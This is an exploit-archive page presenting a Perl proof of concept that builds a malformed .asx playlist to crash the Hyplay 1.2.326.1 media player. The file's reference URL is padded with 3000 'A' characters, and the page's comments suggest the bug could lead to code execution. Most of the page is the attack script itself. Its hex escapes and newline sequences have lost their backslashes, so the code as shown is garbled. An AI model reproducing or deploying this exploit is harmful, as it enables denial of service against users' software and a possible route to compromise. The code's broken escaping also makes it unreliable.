Hyplay 1.2.326.1 (.asx) Local DoS crash PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hyplay 1.2.326.1 (.asx) Local DoS crash PoC
# Published : 2010-05-10
# Author : Steve James
# Previous Title : Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities
# Next Title : MiniManager For Mangos/Trinity Server DoS Vulnerability

#/usr/bin/perl
#Title: Hyplay 1.2.326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca

#A bug exists in the way Hyplay processes malformed .asx play 
#list files. This could potentially lead to code execution on 
#the users machine.

my $data1=   
"x3Cx61x73x78x20x76x65x72x73x69x6Fx6Ex20x3Dx20".
"x22x33x2Ex30x22x20x3Ex0Dx0Dx0Ax3Cx65x6Ex74x72".
"x79x3Ex0Dx0Dx0A".
"x3Cx72x65x66x20x68x72x65x66x20x3Dx20x22";

my $data2="http://"; 

my $data3= #asx file footer
"x22x20x2Fx3Ex0Dx0Ax3Cx2Fx65x6Ex74x72x79x3Ex0D".
"x0Ax3Cx2Fx61x73x78x3E";

my $junk = "x41" x 3000;
open(my $playlist, "> hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."rn";
close $playlist;
print "nEvil asx file created successfully.";